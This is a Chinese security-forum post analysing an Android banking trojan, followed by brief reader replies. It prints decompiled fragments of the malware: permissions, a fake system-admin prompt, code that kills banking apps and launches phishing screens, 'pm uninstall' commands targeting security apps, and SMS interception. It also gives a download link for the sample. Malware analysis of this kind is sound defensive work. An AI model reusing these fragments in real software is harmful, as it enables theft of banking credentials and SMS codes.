吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 51953|回复: 144
收起左侧

[移动样本分析] 【原创】对android病毒“银行悍匪”分析

  [复制链接]
kangkai 发表于 2014-2-22 17:10
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 kangkai 于 2014-3-2 21:24 编辑

一、  病毒样本基本信息

FileName: b5910a432d2b866e1028f31874edb32f .apk

File MD5: b5910a432d2b866e1028f31874edb32f

SHA1:0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1

File Size: 829006 Byte

Package:langthing.nend   

Download:http://yunpan.cn/Q4qHuRLaNivtd    访问密码 3a90     解压密码:52pojie

// 该病毒首先伪装成系统程序防止卸载;然后试着去卸载安全软件;监测各种银行应用;对需要拦截短信的关键字进行了加密,增加了分析的难度;没有MAIN和LAUNCHER组件,安装后没有图标,防止用户察觉到安装了应用


二、  病毒代码分析


查看AndroidManifest.xml配置文件,可以发现赋予了病毒非常多的权限,且是高危的权限,例如发送短信、拨打电话、读取日志文件、重启应用程序等等,且没有MAIN和LAUNCHER组件
[AppleScript] 纯文本查看 复制代码
<manifest android:versionCode="1" android:versionName="1.1" package="langthing.nend"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-permission android:name="android.permission.RECEIVE_SMS" />  //接收短信
    <uses-permission android:name="android.permission.SEND_SMS" />      //发送短信
    <uses-permission android:name="android.permission.READ_SMS" />     //读取短息
    <uses-permission android:name="android.permission.WRITE_SMS" />  //编辑短信
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />    //读取通讯录
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />   //读取系统设置的数据库权限
    <uses-permission android:name="android.permission.READ_LOGS" />           //读取日志文件
    <uses-permission android:name="android.permission.WRITE_CONTACTS" />//编辑通讯录联系人
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />//读取电话状态
    <uses-permission android:name="android.permission.CALL_PHONE" />         //拨打电话
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />//接收开机信息
    <uses-permission android:name="android.permission.GET_TASKS" />  //获取运行程序信息
<uses-permission android:name="android.permission.RESTART_PACKAGES" />//重启应用程序


查看AndroidManifest.xml配置文件,可以发现当手机接收到TReceivereviceAdminReceiverAlarmreceiver等组件时就会启动程序


[AppleScript] 纯文本查看 复制代码
receiver android:name=".TReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver android:label="@string/app_name" android:name=".deviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
        <receiver android:name=".Alarmreceiver">
            <intent-filter>
                <action android:name="arui.alarm.action" />
            </intent-filter>
        </receiver>
        <receiver android:name=".ShutdownReceiver">
            <intent-filter>
                <action android:name="android.intent.action.ACTION_SHUTDOWN" />
            </intent-filter>


恶意注入代码的代码树如下:

恶意注入代码的代码树.png

当程序安装后,会伪装成系统程序,防止卸载。如图:

防卸载.png


查看langthing.nend.main伪装成系统代码如下:
[Java] 纯文本查看 复制代码
private void b()
  {
    Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
    localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.c);
    localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "------ android ------");  //  伪装成系统应用
    startActivityForResult(localIntent, 1);
  }

当应用监测到银行客户端启动时,就会终止个银行进程,并为工商银行、淘宝等定制了高仿真钓鱼界面
[Java] 纯文本查看 复制代码
private void e()
  {
    ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity;
    ActivityManager localActivityManager = (ActivityManager)getSystemService("activity");
    String str = localComponentName.getClassName();
    if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz")))
    {
      if (a(getApplicationContext(), "com.icbc"))
        localActivityManager.restartPackage("com.icbc");
      if (a(getApplicationContext(), "com.chinamworld.main"))
        localActivityManager.restartPackage("com.chinamworld.main");
      if (a(getApplicationContext(), "com.bankcomm"))
        localActivityManager.restartPackage("com.bankcomm");
      if (a(getApplicationContext(), "com.taobao.taobao"))
        localActivityManager.restartPackage("com.taobao.taobao");
      if (a(getApplicationContext(), "com.android.bankabc"))
        localActivityManager.restartPackage("com.android.bankabc");
      if (a(getApplicationContext(), "cmb.pb"))
        localActivityManager.restartPackage("cmb.pb");
      if (a(getApplicationContext(), "com.rytong.bankgdb"))
        localActivityManager.restartPackage("com.rytong.bankgdb");
      if (a(getApplicationContext(), "com.cib.bankcib"))
        localActivityManager.restartPackage("com.cib.bankcib");
      if (a(getApplicationContext(), "com.rytong.bankps"))
        localActivityManager.restartPackage("com.rytong.bankps");
      if (a(getApplicationContext(), "cn.com.njcb.android.mobilebank"))
        localActivityManager.restartPackage("cn.com.njcb.android.mobilebank");
      if (a(getApplicationContext(), "com.ecitic.bank.mobile"))
        localActivityManager.restartPackage("com.ecitic.bank.mobile");
      if (a(getApplicationContext(), "com.cebbank.bankebb"))
        localActivityManager.restartPackage("com.cebbank.bankebb");
      if (a(getApplicationContext(), "cn.com.cmbc.mbank"))
        localActivityManager.restartPackage("cn.com.cmbc.mbank");
      if (a(getApplicationContext(), "cn.com.spdb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.spdb.mobilebank.per");
      if (a(getApplicationContext(), "com.pingan.pabank.activity"))
        localActivityManager.restartPackage("com.pingan.pabank.activity");
      if (a(getApplicationContext(), "com.gzrcb.mobilebank"))
        localActivityManager.restartPackage("com.gzrcb.mobilebank");
      if (a(getApplicationContext(), "cn.com.cqb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.cqb.mobilebank.per");
      if (a(getApplicationContext(), "com.chinamworld.bocmbci"))
        localActivityManager.restartPackage("com.chinamworld.bocmbci");
      if (a(getApplicationContext(), "com.rytong.app.bankhx"))
        localActivityManager.restartPackage("com.rytong.app.bankhx");
      if (a(getApplicationContext(), "com.csii.huzhou.mobilebank"))
        localActivityManager.restartPackage("com.csii.huzhou.mobilebank");
      if (a(getApplicationContext(), "cn.com.shbank.mper"))
        localActivityManager.restartPackage("cn.com.shbank.mper");
      if (a(getApplicationContext(), "com.rytong.bankqd"))
        localActivityManager.restartPackage("com.rytong.bankqd");
      if (a(getApplicationContext(), "com.tlbank"))
        localActivityManager.restartPackage("com.tlbank");
      if (a(getApplicationContext(), "com.sookin.scyh"))
        localActivityManager.restartPackage("com.sookin.scyh");
      if (a(getApplicationContext(), "cn.com.hzb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.hzb.mobilebank.per");
      if (a(getApplicationContext(), "com.chinamworld.klb"))
        localActivityManager.restartPackage("com.chinamworld.klb");
}
if (str.contains("icbc"))
    {
      Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null);
      if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.icbc");
        new Intent("android.intent.action.MAIN");
        Intent localIntent53 = new Intent("android.intent.action.MAIN");
        localIntent53.setFlags(268435456);
        localIntent53.addCategory("android.intent.category.HOME");
        startActivity(localIntent53);
        Intent localIntent54 = new Intent(getApplicationContext(), gs.class);
        localIntent54.setFlags(268435456);
        startActivity(localIntent54);
      }
    }
    if (str.contains("com.chinamworld.main"))
    {
      Cursor localCursor26 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "js" }, null, null, null);
      if ((localCursor26.moveToFirst()) && (localCursor26.getInt(localCursor26.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.chinamworld.main");
        new Intent("android.intent.action.MAIN");
        Intent localIntent51 = new Intent("android.intent.action.MAIN");
        localIntent51.setFlags(268435456);
        localIntent51.addCategory("android.intent.category.HOME");
        startActivity(localIntent51);
        Intent localIntent52 = new Intent(getApplicationContext(), js.class);
        localIntent52.setFlags(268435456);
        startActivity(localIntent52);
      }
    }
    if (str.contains("bankcomm"))
    {
      Cursor localCursor25 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "jt" }, null, null, null);
      if ((localCursor25.moveToFirst()) && (localCursor25.getInt(localCursor25.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.bankcomm");
        new Intent("android.intent.action.MAIN");
        Intent localIntent49 = new Intent("android.intent.action.MAIN");
        localIntent49.setFlags(268435456);
        localIntent49.addCategory("android.intent.category.HOME");
        startActivity(localIntent49);
        Intent localIntent50 = new Intent(getApplicationContext(), jt.class);
        localIntent50.setFlags(268435456);
        startActivity(localIntent50);
      }
    }
    if (str.contains("taobao"))
    {
      Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null);
      if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.taobao.taobao");
        new Intent("android.intent.action.MAIN");
        Intent localIntent47 = new Intent("android.intent.action.MAIN");
        localIntent47.setFlags(268435456);
        localIntent47.addCategory("android.intent.category.HOME");
        startActivity(localIntent47);
        Intent localIntent48 = new Intent(getApplicationContext(), tb.class);
        localIntent48.setFlags(268435456);
        startActivity(localIntent48);
      }

//  终止各银行进程

查找安全软件并卸载安全软件
[Java] 纯文本查看 复制代码
 for (g = "Already root"; ; g = "NOroot")
    {
      this.C = 5;
      this.E = 5;
      this.B = new String[this.C];
      this.D = new String[this.E];
      this.B[0] = "pm uninstall com.qihoo360.mobilesafe";     //卸载360、腾讯、金山等相关的安全软件
      this.B[1] = "pm uninstall com.tencent.qqpimsecure"; 
      this.B[2] = "pm uninstall com.ijinshan.mguard";       
      this.B[3] = "pm uninstall com.ijinshan.duba";           
      this.B[4] = "pm uninstall com.anguanjia.safe";
      this.D[0] = "com.qihoo360.mobilesafe";
      this.D[1] = "com.tencent.qqpimsecure";
      this.D[2] = "com.ijinshan.mguard";
      this.D[3] = "com.ijinshan.duba";
      this.D[4] = "com.anguanjia.safe";
      this.s = new o();

拦截相关短信:
[Java] 纯文本查看 复制代码
f (i5 == 1)
          if ((server.f == 0) && (server.a != i3))
          {
            server.a(this.a, 1);
            server.b(this.a, i3);
            str4 = "接收";
            server.a(this.a, new o());
            String str5 = server.d(this.a).a(this.a.getApplicationContext());
            server.a(this.a, new n());
            server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5);
            localStringBuilder.append("[ ");
            localStringBuilder.append(str1 + ", ");
            localStringBuilder.append(i4 + ", ");
            localStringBuilder.append(str2 + ", ");
            localStringBuilder.append(str3 + ", ");
            localStringBuilder.append(str4);
            localStringBuilder.append(" ]\n\n");
            if (!localCursor1.isClosed())
              localCursor1.close();
          }
      }
      while (true)
      {
        localStringBuilder.append("getSmsInPhone has executed!");
        super.onChange(paramBoolean);
        return;
        server.f = 0;
        break;
        if (i5 != 2)
          break;
        if (server.b == i3)
          break label760;
        Cursor localCursor2 = server.c.a("send", null, null, null, null, null, "_id ASC");
        if (localCursor2.moveToFirst())
        {
          localCursor2.getColumnIndex("_id");
          int i6 = localCursor2.getColumnIndex("sSend");
          do
            server.a(this.a, localCursor2.getString(i6));
          while (localCursor2.moveToNext());
        }
        localCursor2.close();
        if (server.h(this.a).equals("1"))
        {
          server.a(this.a, new o());
          server.a(this.a, new n());
          String str6 = server.d(this.a).a(this.a.getApplicationContext());
          server.a(this.a, str2 + ";" + str1, str6);
        }
        server.b = i3;
        str4 = "发送";
        break;
        localStringBuilder.append("no result!");
      }
    }
    catch (SQLiteException localSQLiteException)
    {
      while (true)
      {
        continue;
        label760: String str4 = "null";
      }
    }
  }
}

解密密钥:
[Java] 纯文本查看 复制代码
public void a()
  {
    try
    {
      InputStream localInputStream = getAssets().open("unhi.db");     // 密钥
      FileOutputStream localFileOutputStream = new FileOutputStream(this.q + "unhi.db");
      byte[] arrayOfByte = new byte[1024];
      while (true)
      {
        int i1 = localInputStream.read(arrayOfByte);
        if (i1 <= 0)
        {
          localFileOutputStream.flush();
          localFileOutputStream.close();
          localInputStream.close();
          return;
        }
        localFileOutputStream.write(arrayOfByte, 0, i1);
      }
    }
    catch (Exception localException)
    {
    }
  }

  public void a(String paramString)
  {
    if (!new File(paramString).exists())
      a();
  }

  public void c()
  {
    new l(this).start();
  }

  public IBinder onBind(Intent paramIntent)
  {
    return null;
  }

  public void onCreate()
  {
    this.u = new e();
    IntentFilter localIntentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
    localIntentFilter.setPriority(2147483647);
    registerReceiver(this.u, localIntentFilter);
    p = (ActivityManager)getSystemService("activity");
    this.F = 0;
this.j = false;


b(this.s.a(getApplicationContext()), "201305:" + g + ";ver:" + Build.VERSION.RELEASE + ";Model:" + Build.MODEL);
      this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + "/");
      a(this.q + "unhi.db");
      c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + "/unhi.db", null, 1);
      m localm = new m(this, new Handler());
      getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localm);
      Intent localIntent = new Intent(getApplicationContext(), log.class);
      localIntent.setFlags(268435456);
      startService(localIntent);


密钥.png

三、  总结
该病毒尝试着去卸载安全软件;采用了加密技术,增加了分析难度;并隐藏运行界面,防止用户察觉。可以看出移动安全问题越演越烈,且手段越来越高明,增加了分析难度。



// 由于本人对于密码学方面还没有Hello World的水平,所以无法解密相关信息,水平有限。



免费评分

参与人数 1热心值 +1 收起 理由
喜子12131 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

小king 发表于 2014-2-22 17:18
支持一下,手机上的360估计也就是个软件推广工具吧……
下东西尽量从Google Play上面下应该就能避免这些软件了吧
netstyle 发表于 2014-3-14 21:07
这种病毒入侵方式比较强大 不知道楼主是否了解一种安卓病毒 会在用户启动银行等系统时 后台启动截图程序(当然是隐藏的应用程序查看不到的),登陆银行输入密码的时候都会智能截图,然后可能会对截取得图片加密,然后上传到某服务器~   是我脑补太严重了么??
头像被屏蔽
892644330 发表于 2014-2-22 17:21
blmk 发表于 2014-2-22 17:24
好可怕的,病毒升级了!
2dehen 发表于 2014-3-1 18:15
太强悍了吧,以后得小心着自己的手机网银了
社会太现实 发表于 2014-3-1 18:28
楼主强大!!!!
不二男人 发表于 2014-3-1 20:16
现在的病毒可以说越来越牛了啊,,受不了了手机都别用了
头像被屏蔽
bin3008 发表于 2014-3-1 21:16
谢谢分享爱那个
小宇0721 发表于 2014-3-2 09:21
厉害。。
慢慢努力。。。
小黑and小白 发表于 2014-3-2 10:16
看來防不勝防啊。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 14:04

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表